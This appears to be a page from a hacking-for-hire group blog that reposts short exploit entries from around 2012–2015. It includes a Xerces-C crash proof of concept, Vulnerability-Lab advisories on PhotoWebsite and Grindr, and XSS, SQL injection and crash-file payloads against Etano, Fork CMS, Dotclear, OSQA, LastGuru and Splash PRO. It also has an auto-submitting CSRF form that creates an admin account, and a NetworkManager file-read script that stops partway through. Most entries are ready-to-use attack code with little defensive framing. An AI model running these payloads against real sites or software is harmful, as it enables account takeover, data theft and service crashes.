Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863151852

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Apache Xerces-C XML Parser (< 3.1.2) DoS POC
# Date: 2015-05-03
# Exploit Author: beford
# Vendor Homepage: http://xerces.apache.org/#xerces-c
# Version: Versions prior to 3.1.2
# Tested on: Ubuntu 15.04
# CVE : CVE-2015-0252

Apache Xerces-C XML Parser Crashes on Malformed Input

I believe this to be the same issue that was reported on CVE-2015-0252,
posting this in case anyone is interested in reproducing it.

Original advisory:
https://xerces.apache.org/xerces-c/secadv/CVE-2015-0252.txt

$ printf "\xff\xfe\x00\x00\x3c" > file.xml

$ DOMPrint ./file.xml   # Ubuntu 15.04 libxerces-c3.1 package
Segmentation fault

$ ./DOMPrint ./file.xml # ASAN Enabled build
=================================================================
==6831==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb5d9d87c
at pc 0x836a721 bp 0xbf8127a8 sp 0xbf812798
READ of size 1 at 0xb5d9d87c thread T0
    #0 0x836a720 in xercesc_3_1::XMLReader::refreshRawBuffer()
xercesc/internal/XMLReader.cpp:1719
    #1 0x836a720 in xercesc_3_1::XMLReader::xcodeMoreChars(unsigned short*,
unsigned char*, unsigned int) xercesc/internal/XMLReader.cpp:1761
    #2 0x837183f in xercesc_3_1::XMLReader::refreshCharBuffer()
xercesc/internal/XMLReader.cpp:576
    #3 0x837183f in xercesc_3_1::XMLReader::peekString(unsigned short
const*) xercesc/internal/XMLReader.cpp:1223
    #4 0x83ad0ae in xercesc_3_1::ReaderMgr::peekString(unsigned short
const*) xercesc/internal/ReaderMgr.hpp:385
    #5 0x83ad0ae in xercesc_3_1::XMLScanner::checkXMLDecl(bool)
xercesc/internal/XMLScanner.cpp:1608
    #6 0x83b6469 in xercesc_3_1::XMLScanner::scanProlog()
xercesc/internal/XMLScanner.cpp:1244
    #7 0x8d69220 in
xercesc_3_1::IGXMLScanner::scanDocument(xercesc_3_1::InputSource const&)
xercesc/internal/IGXMLScanner.cpp:206
    #8 0x83cd3e7 in xercesc_3_1::XMLScanner::scanDocument(unsigned short
const*) xercesc/internal/XMLScanner.cpp:400
    #9 0x83ce728 in xercesc_3_1::XMLScanner::scanDocument(char const*)
xercesc/internal/XMLScanner.cpp:408
    #10 0x849afc5 in xercesc_3_1::AbstractDOMParser::parse(char const*)
xercesc/parsers/AbstractDOMParser.cpp:601
    #11 0x8050bf2 in main src/DOMPrint/DOMPrint.cpp:398
    #12 0xb6f5272d in __libc_start_main
(/lib/i386-linux-gnu/libc.so.6+0x1872d)
    #13 0x805d3b5 (/ramdisk/DOMPrint+0x805d3b5)

0xb5d9d87c is located 0 bytes to the right of 163964-byte region
[0xb5d75800,0xb5d9d87c)
allocated by thread T0 here:
    #0 0xb72c3ae4 in operator new(unsigned int)
(/usr/lib/i386-linux-gnu/libasan.so.1+0x51ae4)
    #1 0x8340cce in xercesc_3_1::MemoryManagerImpl::allocate(unsigned int)
xercesc/internal/MemoryManagerImpl.cpp:40
    #2 0x8094cb2 in xercesc_3_1::XMemory::operator new(unsigned int,
xercesc_3_1::MemoryManager*) xercesc/util/XMemory.cpp:68
    #3 0x8daaaa7 in
xercesc_3_1::IGXMLScanner::scanReset(xercesc_3_1::InputSource const&)
xercesc/internal/IGXMLScanner2.cpp:1284
    #4 0x8d6912a in
xercesc_3_1::IGXMLScanner::scanDocument(xercesc_3_1::InputSource const&)
xercesc/internal/IGXMLScanner.cpp:198
    #5 0x83cd3e7 in xercesc_3_1::XMLScanner::scanDocument(unsigned short
const*) xercesc/internal/XMLScanner.cpp:400
    #6 0x83ce728 in xercesc_3_1::XMLScanner::scanDocument(char const*)
xercesc/internal/XMLScanner.cpp:408
    #7 0x849afc5 in xercesc_3_1::AbstractDOMParser::parse(char const*)
xercesc/parsers/AbstractDOMParser.cpp:601
    #8 0x8050bf2 in main src/DOMPrint/DOMPrint.cpp:398
    #9 0xb6f5272d in __libc_start_main
(/lib/i386-linux-gnu/libc.so.6+0x1872d)

SUMMARY: AddressSanitizer: heap-buffer-overflow
xercesc/internal/XMLReader.cpp:1719
xercesc_3_1::XMLReader::refreshRawBuffer()
HireHackking 
Document Title:
===============
PhotoWebsite v3.1 iOS - File Include Web Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1474


Release Date:
=============
2015-05-04


Vulnerability Laboratory ID (VL-ID):
====================================
1476


Common Vulnerability Scoring System:
====================================
6.6


Product & Service Introduction:
===============================
Photo Website lets your Camera Roll to become a website. The app let the iphone/ipad become a website. It is a wifi network app&#65292;
let you access camera roll photos over your pc browser. Now share Camera Roll to your friend is a very simple event.
Fast browsing of thumbnails

(https://itunes.apple.com/de/app/photo-website/id543436097)


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a locla file include vulnerability in the official PhotoWebsite v3.1 iOS mobile web-application.


Vulnerability Disclosure Timeline:
==================================
2015-05-04:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
AirPhoto
Product: PhotoWebsite - iOS Mobile Web Application 3.1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official PhotoWebsite v3.1 iOS mobile web-application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or 
system specific path commands to compromise the mobile web-application.

The web vulnerability is located in the `mDirNameList` and `mDirUrlList` values of the `airphotos.ma - upload` module. Remote attackers are 
able to inject own files with malicious `mDirNameList` values in the `upload.action` sync request to compromise the mobile web-application. 
The local file/path include execution occcurs in the index file dir listing of the wifi interface. The attacker is able to inject the local 
file include request by usage of the `wifi interface` in connection with the vulnerable upload service module.

Remote attackers are also able to exploit the `mDirNameList` and `mDirUrlList` validation issue in combination with persistent injected script 
codes to execute unique local malicious attack requests. The attack vector is located on the application-side of the wifi service and the 
request method to inject is POST (upload) or Sync(device). To exploit the bug it is required to use the local device > wifi sync or (remote) 
the wifi gui.

The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.6. 
Exploitation of the local file include vulnerability requires no user interaction or privileged web-application user account. Successful exploitation 
of the local file include web vulnerability results in mobile application or device compromise.

Request Method(s):
					[+] Sync

Vulnerable Module(s):
					[+] upload

Vulnerable File(s):
					[+] airphotos.ma

Vulnerable Parameter(s):
					[+] mDirNameList
					[+] mDirUrlList

Affected Module(s):
					[+] File Dir Index


Proof of Concept (PoC):
=======================
The local file include web vulnerability can be exploited by local attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

PoC: airphotos.ma
<script language= "JavaScript"   type= "text/javascript">
        var mImgList =[];
        var mWidthList= [];
        var mHeightList= [];
        var mThumWidth=144
        var mDirNameList=["">[LOCAL FILE INCLUDE VULNERABILITY!]",
"Camera Roll",
"My Photo Stream",
];
        var mDirUrlList=["@%22%3E%3C[LOCAL FILE INCLUDE VULNERABILITY!]%3E%5C",
"@Camera%20Roll%5C",
"@My%20Photo%20Stream%5C",
];
        var mUserWH=true;;
        var mUseApShow=false;;
</script>


Reference(s):
http://localhost:1860/airphotos.ma


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable `mDirNameList` and `mDirUrlList`   values.
Restrict the input for folder and album names on sync and disallow special chars.
Encode the file dir index list that shows the malicious context without secure parse to prevent further file include or request injection attacks.


Security Risk:
==============
The security risk of the local file include web vulnerability in the photowebsite wifi app is estimated as high. (CVSS 6.6)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
HireHackking 
Document Title:
===============
Grindr 2.1.1 iOS Bug Bounty #2 - Denial of Service Software Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1418


Release Date:
=============
2015-05-02


Vulnerability Laboratory ID (VL-ID):
====================================
1418


Common Vulnerability Scoring System:
====================================
3.3


Product & Service Introduction:
===============================
Grindr, which first launched in 2009, has exploded into the largest and most popular all-male location-based social network out there. 
With more than 5 million guys in 192 countries around the world -- and approximately 10,000 more new users downloading the app 
every day -- you’ll always find a new date, buddy, or friend on Grindr. Grindr is a simple app that uses your mobile device’s 
location-based services to show you the guys closest to you who are also on Grindr. How much of your info they see is 
entirely your call.

(Copy of the Vendor Homepage: http://grindr.com/learn-more )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a local and remote denial of servie vulnerability in the official  Grindr v2.1.1 iOS mobile web-application.


Vulnerability Disclosure Timeline:
==================================
2015-01-22: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security)
2015-01-22: Vendor Notification (Grinder - Bug Bounty Program)
2015-02-02: Vendor Response/Feedback (Grinder - Bug Bounty Program)
2015-04-01: Vendor Fix/Patch (Grindr Developer Team - Reward: x  & Manager: x)
2015-05-04: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Grindr LLC
Product: Grinder - iOS Mobile Web Application (API) 2.2.1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A local and remote Denial of Service vulnerability has been discovered in the official Grindr v2.1.1 iOS mobile web-application.

The attacker injects a script code tag or multiple termination strings (%00%20%00%20%00) to the Display Name input field of the Edit Profile module.
After the inject the service stored the malicious values as DisplayName. After the inject a random user is processing to click in the profile the
contact information (facebook/twitter). After that the victim wants to copy the link and an internal service corruption occurs thats crashs the mobile app.
The issue is local and remote exploitable.

Vulnerable Module(s):
[+] Edit Profile

Vulnerable Parameter(s): (Input)
[+] Display Name

Affected Module(s):
[+] Contact > Social Network > Copy Link



Proof of Concept (PoC):
=======================
The denial of service web vulnerability can be exploited by remote attacker and local user accounts with low user interaction (click).
To demonstrate the vulnerability or to reproduce the issue follow the provided information and steps below to continue.

Manual steps to reproduce ...
1. Open the grindr mobile application
2. Inject a script code tag as Display Name or use the terminated String with empty values
3. Save and click in the profile the contact button (exp. facebook)
4. Click to the send button ahead and push the Copy Link function
5. The app service is getting terminated with an uncaught exception because of an internal parsing error

Note:To exploit the issue remotly the profile needs to be shared with another user and then the user only needs to push the same way the social contact button.

PoC Video: 


Solution - Fix & Patch:
=======================
First step is to prevent the issue by a secure restriction of the input. Attach a own excpetion-handling to prevent next to the insert itself. 
The social network accounts that are linked do not allow special chars in the username. The grindr ios app and the android app allows to register 
an account and to insert own scripts <html5> or null strings that corrupts the process of copy the link by an error. After the restriction has been 
set in the code of both (api) the issue can not anymore execute to shutdown anothers users account. Even if this issue execution is prevented that 
was only a solution to prevent. 

To fix the bug ...
Connect for example ios device with the running app to windows. Sync the process and reproduce the remote error and local error. Move to the iOS error 
folder that has been synced. Get the error attach another debugger and so on ...


Security Risk:
==============
The secuirty risk of the local and remote denial of service vulnerability in the copy link function that corrupts is estimated as medium.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
HireHackking 
source: https://www.securityfocus.com/bid/52295/info
  
Etano is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
  
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  
Etano versions 1.20 to 1.22 are vulnerable; other versions may be affected. 

http://www.example.com/etano/photo_view.php?photo_id=1&return=";><script>alert(/XSS/)</script>
HireHackking 
source: https://www.securityfocus.com/bid/52295/info
 
Etano is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
 
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
 
Etano versions 1.20 to 1.22 are vulnerable; other versions may be affected. 

http://www.example.com/etano/photo_search.php?&#039;";><script>alert(/XSS/)</script>

http://www.example.com/etano/photo_search.php?st=&#039;";><script>alert(/XSS/)</script>
HireHackking 
source: https://www.securityfocus.com/bid/52295/info

Etano is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Etano versions 1.20 to 1.22 are vulnerable; other versions may be affected. 

http://www.example.com/etano/search.php?&#039;";><script>alert(/XSS/)</script>

http://www.example.com/etano/search.php?st=&#039;";><script>alert(/XSS/)</script>

http://www.example.com/etano/search.php?f17_city=&#039;";><script>alert(/XSS/)</script>&f17_country=0&f17_state=0&f17_zip=3&f19=0&st=basic&wphoto=1

http://www.example.com/etano/search.php?f17_city=0&f17_country=&#039;";><script>alert(/XSS/)</script>&f17_state=0&f17_zip=3&f19=0&st=basic&wphoto=1

http://www.example.com/etano/search.php?f17_city=0&f17_country=0&f17_state=&#039;";><script>alert(/XSS/)</script>&f17_zip=3&f19=0&st=basic&wphoto=1

http://www.example.com/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip=&#039;";><script>alert(/XSS/)</script>&f19=0&st=basic&wphoto=1

http://www.example.com/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip=3&f19=&#039;";><script>alert(/XSS/)</script>&st=basic&wphoto=1

http://www.example.com/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip=3&f19=0&st=&#039;";><script>alert(/XSS/)</script>&wphoto=1

http://www.example.com/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip=3&f19=0&st=basic&wphoto=&#039;";><script>alert(/XSS/)</script>

http://www.example.com/etano/search.php?search=&#039;";><script>alert(/XSS/)</script>&v=g

http://www.example.com/etano/search.php?search=51d43831f5dde83a4eedb23895f165f6&v=&#039;";><script>alert(/XSS/)</script>

http://www.example.com/etano/search.php?st=xss";><script>alert(/XSS/)</script>&user=unknown
HireHackking 
source: https://www.securityfocus.com/bid/52293/info

LastGuru ASP GuestBook is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/victim/View.asp?E_Mail=webmaster@lastguru.com' and 'a'='a
HireHackking 
source: https://www.securityfocus.com/bid/52273/info

Splash PRO is prone to a denial-of-service vulnerability.

Attackers can exploit this issue to crash the affected application, denying service to legitimate users.

Splash PRO 1.12.1 is vulnerable; other versions may also be affected. 

PoC = "\x52\x49\x46\x46\x3c\xad\x08\x00\x41\x56\x49\x20\x4c\x49\x53\x54"
PoC +=  "\x72\x22\x00\x00\x68\x64\x72\x6c"
payload = (PoC)
f = open("Crash.avi","wb")
f.write(payload)
f.close()
HireHackking 
source: https://www.securityfocus.com/bid/52262/info

starCMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 

http://www.example.com/index.php?q=[Xss]&r=5&lang=de&actionsuche=yes
HireHackking 
source: https://www.securityfocus.com/bid/52236/info
 
Fork CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
 
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
 
Fork CMS versions prior to 3.2.7 are vulnerable. 

http://www.example.com/private/en/error?type=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

http://www.example.com/private/en/error?type=action-not-allowed&querystring=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E.1
HireHackking 
# source: https://www.securityfocus.com/bid/52224/info
#
# Traidnt Topics Viewer is prone to a cross-site request-forgery vulnerability.
#
# Exploiting this issue may allow a remote attacker to perform certain administrative actions, gain unauthorized access to the affected application, or delete certain data. Other attacks are also possible.
#
# Traidnt Topics Viewer 2.0 BETA 1 is vulnerable; other versions may also be affected. 
#

<html>
<body onload="javascript:document.forms[0].submit()">
<p>by:thegreenhornet</p>
<form method="POST" name="form0" action="
http://www.example.com/top/admincp/main.php?op=add-admin">
<input type="hidden" name="u_name" value="admin2"/>
<input type="hidden" name="u_m_pass" value="123456"/>
<input type="hidden" name="u_email" value="WW22@rwoot.com"/>
</form>
</body>
HireHackking 
source: https://www.securityfocus.com/bid/52221/info
   
Dotclear is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
   
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
   
Dotclear 2.4.1.2 is vulnerable; prior versions may also be affected. 

http://www.example.com/admin/plugin.php?p=tags&m=tag_posts&tag=[TAG]&page=1%27%22%3E%3Cscript%3Ea lert%28document.cookie%29;%3C/script%3E
HireHackking 
source: https://www.securityfocus.com/bid/52236/info

Fork CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Fork CMS versions prior to 3.2.7 are vulnerable. 

http://www.example.com/private/en/locale/index?name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
HireHackking 
source: https://www.securityfocus.com/bid/52221/info
  
Dotclear is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
  
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
  
Dotclear 2.4.1.2 is vulnerable; prior versions may also be affected. 

http://www.example.com/admin/comments.php?type=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/admin/comments.php?sortby=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/admin/comments.php?order=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/admin/comments.php?status=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
HireHackking 
source: https://www.securityfocus.com/bid/52221/info
 
Dotclear is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
 
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
 
Dotclear 2.4.1.2 is vulnerable; prior versions may also be affected. 

http://www.example.com/admin/blogs.php?nb=5%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
HireHackking 
source: https://www.securityfocus.com/bid/52221/info

Dotclear is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

Dotclear 2.4.1.2 is vulnerable; prior versions may also be affected. 

&lt;form action=&quot;http://www.example.com/admin/auth.php&quot; method=&quot;post&quot;&gt;

&lt;input type=&quot;hidden&quot; name=&quot;new_pwd&quot; value=&quot;1&quot; /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;new_pwd_c&quot; value=&quot;2&quot; /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;login_data&quot; value=&#039;&quot;&gt;&lt;script&gt;alert(document.cookie);&lt;/script&gt;&#039; /&gt;
&lt;input type=&quot;submit&quot; id=&quot;btn&quot;&gt;
&lt;/form&gt;
HireHackking 
source: https://www.securityfocus.com/bid/52184/info

OSQA's CMS is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and control how the site is rendered to the user; other attacks are also possible.

OSQA 3b is vulnerable; other versions may also be affected. 

http://www.example.com/questions/ask/ press url bar & put xss code <img src="<img src=search"/onerror=alert("xss")//">
http://www.example.com/questions/ask/ press picture bar & put xss code <img src="<img src=search"/onerror=alert("xss")//">
HireHackking 
source: https://www.securityfocus.com/bid/52206/info

GNOME NetworkManager is prone to a local arbitrary file-access vulnerability.

Local attackers can exploit this issue to read arbitrary files. This may lead to further attacks.

NetworkManager 0.6, 0.7, and 0.9 are vulnerable; other versions may also be affected.

#!/usr/bin/python
#
# Copyright (C) 2011 SUSE LINUX Products GmbH
#
# Author:     Ludwig Nussel
# 
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# version 2 as published by the Free Software Foundation.
# 
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# 
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA

import gobject

import dbus
import dbus.service
import dbus.mainloop.glib

import os
import subprocess

def N_(x): return x

_debug_level = 0
def debug(level, msg):
    if (level <= _debug_level):
	print '<%d>'%level, msg

class NetworkManager(gobject.GObject):

    NM_STATE = {
	      0: 'UNKNOWN',
	     10: 'UNMANAGED',
	     20: 'UNAVAILABLE',
	     30: 'DISCONNECTED',
	     40: 'PREPARE',
	     50: 'CONFIG',
	     60: 'NEED_AUTH',
	     70: 'IP_CONFIG',
	     80: 'IP_CHECK',
	     90: 'SECONDARIES',
	    100: 'ACTIVATED',
	    110: 'DEACTIVATING',
	    120: 'FAILED',
	    }

    NM_DEVICE_TYPE = {
	    0: 'NM_DEVICE_TYPE_UNKNOWN',  # The device type is unknown. 
	    1: 'NM_DEVICE_TYPE_ETHERNET', # The device is wired Ethernet device. 
	    2: 'NM_DEVICE_TYPE_WIFI',     # The device is an 802.11 WiFi device. 
	    3: 'NM_DEVICE_TYPE_UNUSED1',  # Unused
	    4: 'NM_DEVICE_TYPE_UNUSED2',  # Unused
	    5: 'NM_DEVICE_TYPE_BT',        # The device is Bluetooth device that provides PAN or DUN capabilities. 
	    6: 'NM_DEVICE_TYPE_OLPC_MESH', # The device is an OLPC mesh networking device. 
	    7: 'NM_DEVICE_TYPE_WIMAX',     # The device is an 802.16e Mobile WiMAX device. 
	    8: 'NM_DEVICE_TYPE_MODEM', # The device is a modem supporting one or more of analog telephone, CDMA/EVDO, GSM/UMTS/HSPA, or LTE standards to access a cellular or wireline data network. 
	    }

    NM_802_11_AP_SEC = {
	    'NM_802_11_AP_SEC_NONE': 0x0, # Null flag.
	    'NM_802_11_AP_SEC_PAIR_WEP40': 0x1, # Access point supports pairwise 40-bit WEP encryption.
	    'NM_802_11_AP_SEC_PAIR_WEP104': 0x2, # Access point supports pairwise 104-bit WEP encryption.
	    'NM_802_11_AP_SEC_PAIR_TKIP': 0x4, # Access point supports pairwise TKIP encryption.
	    'NM_802_11_AP_SEC_PAIR_CCMP': 0x8, # Access point supports pairwise CCMP encryption.
	    'NM_802_11_AP_SEC_GROUP_WEP40': 0x10, # Access point supports a group 40-bit WEP cipher.
	    'NM_802_11_AP_SEC_GROUP_WEP104': 0x20, # Access point supports a group 104-bit WEP cipher.
	    'NM_802_11_AP_SEC_GROUP_TKIP': 0x40, # Access point supports a group TKIP cipher.
	    'NM_802_11_AP_SEC_GROUP_CCMP': 0x80, # Access point supports a group CCMP cipher.
	    'NM_802_11_AP_SEC_KEY_MGMT_PSK': 0x100, # Access point supports PSK key management.
	    'NM_802_11_AP_SEC_KEY_MGMT_802_1X': 0x200, # Access point supports 802.1x key management.
	    }

    def __init__(self):
	self.bus = dbus.SystemBus()
	self.proxy = None
	self.manager = None
	self.running = False
	self.devices = {}
	self.devices_by_name = {}
	self.aps = {}
	self.ap_by_addr = {}
	self.ap_by_ssid = {}

	self.check_status()

	self.bus.add_signal_receiver(
	    lambda name, old, new: self.nameowner_changed_handler(name, old, new),
		bus_name='org.freedesktop.DBus',
		dbus_interface='org.freedesktop.DBus',
		signal_name='NameOwnerChanged')

	self.bus.add_signal_receiver(
	    lambda device, **kwargs: self.device_add_rm(device, True, **kwargs),
		bus_name='org.freedesktop.NetworkManager',
		dbus_interface = 'org.freedesktop.NetworkManager',
		signal_name = 'DeviceAdded',
		sender_keyword = 'sender')

	self.bus.add_signal_receiver(
	    lambda device, **kwargs: self.device_add_rm(device, False, **kwargs),
		bus_name='org.freedesktop.NetworkManager',
		dbus_interface = 'org.freedesktop.NetworkManager',
		signal_name = 'DeviceRemoved',
		sender_keyword = 'sender')

    def cleanup(self):
	self.switcher = None

    def devstate2name(self, state):
	if state in self.NM_STATE:
	    return self.NM_STATE[state]
	return "UNKNOWN:%s"%state

    def devtype2name(self, type):
	if type in self.NM_DEVICE_TYPE:
	    return self.NM_DEVICE_TYPE[type]
	return "UNKNOWN:%s"%type

    def secflags2str(self, flags):
	a = []
	for key in self.NM_802_11_AP_SEC.keys():
	    if self.NM_802_11_AP_SEC[key] and flags&self.NM_802_11_AP_SEC[key]:
		a.append(key[len('NM_802_11_AP_SEC_'):])
	return ' '.join(a)

    def nameowner_changed_handler(self, name, old, new):
	if name != 'org.freedesktop.NetworkManager':
	    return
	
	off = old and not new
	self.check_status(off)

    def device_add_rm(self, device, added, sender=None, **kwargs):
	if (added):
	    dev = self.bus.get_object("org.freedesktop.NetworkManager", device)
	    props = dbus.Interface(dev, "org.freedesktop.DBus.Properties")
	    name = props.Get("org.freedesktop.NetworkManager.Device", "Interface")
	    devtype = props.Get("org.freedesktop.NetworkManager.Device", "DeviceType")
